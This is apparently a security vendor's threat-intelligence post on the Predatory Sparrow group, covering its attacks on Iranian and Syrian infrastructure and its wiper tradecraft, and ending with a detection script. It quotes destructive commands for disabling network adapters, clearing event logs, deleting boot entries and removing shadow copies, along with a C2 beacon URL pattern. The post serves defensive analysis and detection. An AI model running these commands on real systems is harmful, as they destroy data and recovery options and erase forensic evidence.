Predatory Sparrow: Inside the Cyber Warfare Targeting Iran's Critical Infrastructure

LAST UPDATED ON NOVEMBER 04, 2025

Predatory Sparrow is a cyber-sabotage group known for its highly disruptive operations, with a particular focus on targeting Iranian infrastructure and institutions. The group has publicly claimed responsibility for a series of high-profile cyberattacks against various sectors in Iran, including critical infrastructure, government organizations, and financial institutions. Their operations are often marked by substantial operational disruption, deliberate data destruction, and provocative public messaging aimed at taunting their targets. Analysts widely believe that Predatory Sparrow is affiliated with Israel, operating within the broader context of the ongoing cyber shadow war between the two nations, which has seen both offensive and defensive cyber operations unfold over the past decade.

The group has demonstrated a broad capability to impact diverse segments of Iran's national infrastructure, highlighting its sophisticated operational reach. One of their most notable operations involved Iran's national railway system, where cyberattacks led to widespread paralysis and significant operational delays, illustrating the group's ability to disrupt essential public services. Predatory Sparrow has also conducted attacks on Iranian industrial targets such as steel companies, causing operational disruptions and triggering fires, further emphasizing the destructive nature of their campaigns. In the financial sector, the group has targeted major institutions including Bank Sepah and the Nobitex cryptocurrency exchange. In a particularly high-profile financial attack, Predatory Sparrow claimed to have burned $90 million in cryptocurrency and published Nobitex's entire source code, infrastructure documentation, and internal privacy research and development [1], a move that exposed both operational vulnerabilities and sensitive intellectual property. These actions are widely interpreted as part of a broader strategy to destabilize Iran, disrupt critical operations, and respond
to perceived Iranian cyber or geopolitical aggressions.

In this post, we will explore the major historical operations of Predatory Sparrow, highlight their notable attacks on Iran's critical infrastructure and financial systems, and examine the group's tactics, techniques, and procedures (TTPs) to understand how they conduct disruptive cyber operations. In the end, we will show how Picus helps defend against this group.

September 2019: A cyberattack targeted Alfadelex Trading, a Syrian company offering currency exchange and money transfer services [2].

January 2020: Cham Wings Airlines, a privately owned Syrian airline, was attacked [2].

February-April 2020: The network infrastructures of Afrada and the Katerji Group, both Syrian-based firms, were seized [2].

November 2020: Predatory Sparrow issued a threat to attack the Banias Oil Refinery in Syria, though it remains uncertain whether the attack took place [2].

July 2021: Predatory Sparrow attacked Iran's national railway system, disrupting services and displaying messages like "cyberattack" on station boards. This attack utilized the Meteor wiper malware [2].

27 June 2022: The group claimed responsibility for a cyberattack on an Iranian steel manufacturing plant. The advanced operation triggered a major fire at the site, leading to significant physical damage.

December 2023: Predatory Sparrow claimed that it was behind a cyberattack that disrupted a large number of gas stations across Iran. In a statement posted on X (formerly Twitter), the group said the operation had disabled most of Iran's fuel pumps, describing it as a retaliatory move against the actions of the Islamic Republic and its regional proxies [3].

17 June 2025: Soon after Israeli airstrikes on Iran, a Predatory Sparrow cyberattack targeted the state-owned Bank Sepah, disrupting its services. The group claimed to have erased the bank's data and accused it of financing Iran's military. The group additionally claimed responsibility for a strike on
the Iranian cryptocurrency exchange Nobitex the next day, in which they took $90 million in crypto assets and rendered them unrecoverable by transferring them to inaccessible addresses [1].

In a Predatory Sparrow attack against Iran, researchers found a setup.bat script that performs host discovery by checking the machine's hostname against PIS-APP, PIS-MOB, WSUSPROXY, and PIS-DB; if a match is found, it aborts and removes the malicious folder. With this behaviour, the malware specifically avoids executing on hosts with PIS (Passenger Information System) names, the systems that update platform boards, ensuring the attackers' message will be displayed properly on those public-facing devices [2].

Adversaries may abuse the Windows Task Scheduler to schedule initial or recurring execution of malicious code. Predatory Sparrow's msrun.bat, one of the scripts used in the attack on Iranian Railways and the Ministry of Roads and Urban Development, is responsible for unleashing a wiper: it moves wiper-related files to C:\temp. The script then creates a scheduled task named mstask, configured to run the wiper a single time at 23:55:00 [2].

Predatory Sparrow used a sequence of Windows batch files: setup.bat and update.bat (started by setup.bat), where update.bat uses the hard-coded password "hackemall" to unpack the next-stage scripts cache.bat, msrun.bat, and bcd.bat. This activity uses native Windows batch scripting to stage and execute multi-stage payloads, and the extracted cache.bat disables all network adapters on the machine with the command [2]:

    powershell -Command "Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($_.NetEnabled) { $_.Disable() } }" > NUL

Both attacks in Syria by Predatory Sparrow began with a VBS dropper, resolve.vbs, that extracted a password-protected RAR to C:\Program Files\Windows NT\Accessories, containing a second RAR and three VBS scripts. Resolve.vbs executed those scripts sequentially: the first enumerated installed programs to detect Kaspersky and attempted to uninstall it using hard-coded domain credentials. The second checked for Kaspersky's
avp.exe and attempted to remove its license, and the final script extracted the second-stage RAR and executed its contained executable, a Stardust wiper variant [2].

Attackers often encrypt or encode file contents to hide malicious artifacts and evade detection during intrusions. The Meteor wiper attributed to the Predatory Sparrow group used an encrypted configuration file named msconf.conf and also stored encrypted log files during its Iran-targeted attacks. A helper script to decrypt the configuration file and logs is provided below [2]:

    from malduck import xor, u32

    def decode_buffer(buf, key):
        # Each byte is XORed with its own index (rolled modulo 256) and the repeating key
        results = ""
        for k, v in enumerate(buf):
            results += chr(((k % 256) ^ key[k % len(key)] ^ v) & 0xff)
        return results

    def decode_log_file(file_path):
        # Log files are a sequence of records, each prefixed by a 4-byte XORed length field
        content = open(file_path, "rb").read()
        key = b"aceg"  # modified "abcdz" because of shifting indexes
        offset = 0
        while offset < len(content):
            sz = u32(xor(key, content[offset:offset + 4])) + 4
            print(decode_buffer(content[offset:offset + sz], b"abcdz"))
            offset += sz

    def decode_config(file_path, key=b"abcdz"):
        # msconf.conf is a single buffer encoded with the default key
        content = open(file_path, "rb").read()
        return decode_buffer(content, key)

A script named bcd.bat used by Predatory Sparrow leverages wevtutil to delete the Security, System, and Application Event Viewer logs, effectively erasing forensic evidence of activity [2]. With administrator privileges, the event logs can be cleared with the following utility commands:

    wevtutil cl system
    wevtutil cl application
    wevtutil cl security

Predatory Sparrow probes for third-party antivirus (Kaspersky) and, when it is not found, targets built-in protections. It has been observed to add attack-related files and folders to Windows Defender's exclusion list. This behavior enables persistence and execution with a reduced chance of detection [2].

While some VBS scripts run, they issue GET requests to a command-and-control server to report progress, using URLs of the form:

    https://<C&C IP>/progress.php?hn=&dt=&st=&rs=

The query parameters transmit the host name (hn), the current timestamp (dt), the execution step (st), and information
about whether Kaspersky AV is running (rs), with the C&C IP varying between attacks [2].

Adversaries may transfer tools or other files from external systems into a compromised environment. For example, a batch file used by the Predatory Sparrow group downloads a CAB archive, env.cab, from the internal path \\railways.ir\sysvol\railways.ir\scripts\env.cab, and the use of that specific path indicates prior knowledge of the environment [2].

The main payload used by Predatory Sparrow against Iranian Railways and the Ministry of Roads and Urban Development is an executable named msapp.exe, a wiper designed to render infected machines unusable by locking them and wiping their contents. Upon execution, the malware hides its console window to reduce the chance of detection. The program records the phrase "Meteor has started" to an encrypted log file, suggesting the malware's internal name is Meteor [2].

A malicious bcd.bat used by the threat actor Predatory Sparrow attempts to sabotage the Windows boot process by overwriting the boot configuration and then removing existing boot entries via the built-in BCDEdit utility, using the command below [2]:

    for /F "tokens=2" %%j in ('%comspec% /c bcdedit /v ^| findstr identifier') do bcdedit /delete %%j /f

Native Windows utilities have also been abused by adversaries to disable system recovery features. For example, vssadmin.exe or Windows Management Instrumentation (WMIC) can remove all volume shadow copies. The Predatory Sparrow wiper attempts to remove shadow copies by running both the vssadmin and wmic commands [2]:

    vssadmin.exe delete shadows /all /quiet
    wmic.exe shadowcopy delete

We also strongly suggest simulating Predatory Sparrow attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
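The native-utility activity described above (wevtutil log clearing, the mstask scheduled task, the Win32_NetworkAdapter disable one-liner, bcdedit entry deletion, shadow copy removal, Defender exclusions, and the progress.php beacon) is what process-creation and proxy telemetry are most likely to capture. The following added Python example is not from the original post or from Check Point's research; it runs simple regex detections over constructed sample log lines. The schtasks and Add-MpPreference command shapes in the samples are assumptions, since the post names only the task and the exclusion behaviour, and the beacon IP is a constructed documentation address.

```python
import re

# Detection rules derived from the Predatory Sparrow tradecraft described in this post.
# Each tuple is (rule name, regex applied to a process command line).
RULES = [
    ("event_log_clearing", re.compile(r"\bwevtutil(\.exe)?\s+cl\s+(system|application|security)\b", re.I)),
    ("shadow_copy_deletion", re.compile(r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)", re.I)),
    ("bcd_entry_deletion", re.compile(r"\bbcdedit(\.exe)?\b.*\s/delete\b", re.I)),
    ("network_adapter_disable", re.compile(r"Win32_NetworkAdapter.*\.Disable\(", re.I)),
    ("wiper_task_mstask", re.compile(r"\bschtasks(\.exe)?\b.*\bmstask\b", re.I)),
    ("defender_exclusion", re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\b", re.I)),
]
# Progress-reporting beacon: /progress.php?hn=<host>&dt=<timestamp>&st=<step>&rs=<AV state>
C2_BEACON = re.compile(r"/progress\.php\?hn=[^&\s]+&dt=[^&\s]+&st=[^&\s]+&rs=", re.I)

# Constructed sample log lines (not real telemetry). The schtasks and Add-MpPreference
# command shapes are assumed; the post only names the task and the exclusion behaviour.
SAMPLE_PROCESS_LOGS = [
    r'4688 Parent=C:\temp\bcd.bat CommandLine="wevtutil cl security"',
    r'4688 Parent=C:\temp\msapp.exe CommandLine="vssadmin.exe delete shadows /all /quiet"',
    r'4688 Parent=C:\temp\msapp.exe CommandLine="wmic.exe shadowcopy delete"',
    r'4688 Parent=C:\temp\bcd.bat CommandLine="bcdedit /delete {default} /f"',
    r'4688 Parent=C:\temp\cache.bat CommandLine="powershell -Command Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($_.NetEnabled) { $_.Disable() } }"',
    r'4688 Parent=C:\temp\msrun.bat CommandLine="schtasks /create /sc once /st 23:55 /tn mstask /tr C:\temp\msapp.exe"',
    r'4688 Parent=C:\temp\setup.bat CommandLine="powershell Add-MpPreference -ExclusionPath C:\temp"',
    r'4688 Parent=C:\Windows\explorer.exe CommandLine="notepad.exe C:\Users\ops\notes.txt"',
]
SAMPLE_PROXY_LOGS = [
    "GET https://203.0.113.10/progress.php?hn=RAIL-WS-07&dt=1626700000&st=2&rs=0 200",
    "GET https://example.org/progress.php?page=1 200",
]

def scan_command_lines(lines):
    """Return (rule name, line) pairs for every line that trips a rule."""
    hits = []
    for line in lines:
        for name, rx in RULES:
            if rx.search(line):
                hits.append((name, line))
    return hits

def scan_proxy_logs(lines):
    """Return the proxy log lines whose URL matches the beacon format."""
    return [line for line in lines if C2_BEACON.search(line)]

if __name__ == "__main__":
    for name, line in scan_command_lines(SAMPLE_PROCESS_LOGS):
        print(f"[{name}] {line}")
    for line in scan_proxy_logs(SAMPLE_PROXY_LOGS):
        print(f"[c2_progress_beacon] {line}")
```

Any single hit is worth triage on its own; several of these rules firing from the same C:\temp parent within minutes is the sequence the post describes.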
Picus Threat Library includes the following threats for Predatory Sparrow:

    Threat ID   Threat Name                                Attack Module
    77438       Predatory Sparrow Threat Group Campaign    Windows Endpoint

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

Predatory Sparrow is also known as Gonjeshke Darande and Indra.

References

[1] "Inside the Nobitex Breach: What the Leaked Source Code Reveals About Iran's Crypto Infrastructure." Accessed: Oct. 15, 2025. [Online]. Available: https://www.trmlabs.com/resources/blog/inside-the-nobitex-breach-what-the-leaked-source-code-reveals-about-irans-crypto-infrastructure
[2] "Indra: Hackers Behind Recent Attacks on Iran," Check Point Research. Accessed: Oct. 15, 2025. [Online]. Available: https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/
[3] E. Groll, "Israel-linked hacking group claims attack on Iranian gas pumps," CyberScoop. Accessed: Oct. 15, 2025. [Online]. Available: https://cyberscoop.com/israel-iran-cyberattack-houthi/


